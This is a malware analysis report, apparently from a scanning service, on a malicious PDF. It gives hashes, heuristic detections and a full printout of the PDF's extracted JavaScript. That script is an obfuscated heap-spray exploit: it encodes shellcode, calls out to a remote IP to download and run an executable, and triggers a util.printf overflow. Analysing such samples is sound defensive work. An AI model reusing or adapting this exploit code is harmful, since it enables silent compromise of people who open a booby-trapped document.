Malicious PDF — malware analysis report

Static analysis result for SHA-256 a98f9dc9f1836e6b…

MALICIOUS

PDF

3.0 KB Created: 2008-08-03 07:51:49 -09:03 Authoring application: Adobe InDesign CS3 (5.0) (via Adobe PDF Library 8.1) First seen: 2013-07-12
MD5: 698574773efa700b9af4d5e166189183 SHA-1: 217e68edc9acf38279c66bcdaf9757166e16d560 SHA-256: a98f9dc9f1836e6be44be584a5121ea2dd5cffc4401daa3903714ddefe4431f7
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

This PDF document contains obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_UNESCAPE. The JavaScript is likely intended to perform malicious actions upon opening the document. The obfuscation suggests an attempt to evade detection. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    u8dEu = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://78.47.132.220/l3/latency.exe?u=i_7_0&spl=p1 Referenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x359 2615 bytes
SHA-256: 2f6764ea97ec55930a610f3c81fd0a83a3924f26c2d873993bcc49ff3ed15b36
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function GrKd5() {
var lsNtGRlky = "http://78.47.132.220/l3/latency.exe?u=i_7_0&spl=p1";
var lzWaQYfRzbB9O = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }
	
for (i = 0; i < lsNtGRlky.length; ) 
{
lzWaQYfRzbB9O += '%u' + ((i+1<lsNtGRlky.length)?lsNtGRlky.charCodeAt(i+1).toString(16):'00')+lsNtGRlky.charCodeAt(i).toString(16);	
i = i + 2;
}

u8dEu = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

home = unescape(lzWaQYfRzbB9O);

runnable = u8dEu+home;
skipper = unescape(abrvalg(("0zx505"+"w0r5q0qq5").replace(new RegExp(/[zxswqr]/g),"")));

while (skipper.length<20+runnable.length)
{
	skipper+=skipper;
}

skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);

while(skipper2.length<(0x40000-20-runnable.length))
{
	skipper2 += skipper2;
	skipper2 += skipper1;//skipper2 = skipper2+skipper2+skipper1;
}

context = new Array();
ii=-1;

while(++ii<1414)
{
	context[ii] = skipper2 + runnable;
}

var n2m2 = 12;
for(i = 0; i < 18; i++){ n2m2 = n2m2 + "9"; }
for(i = 0; i < 276; i++){ n2m2 = n2m2 + "8"; }
var str = "l25k34u35d30u30d30l66";
var fyt = unescape(str.replace(new RegExp(/[lkud]/g),"%"));
var fmck = util;
fmck.printf(fyt, n2m2);
	};

Open this report in the interactive analyzer, or submit your own file for analysis.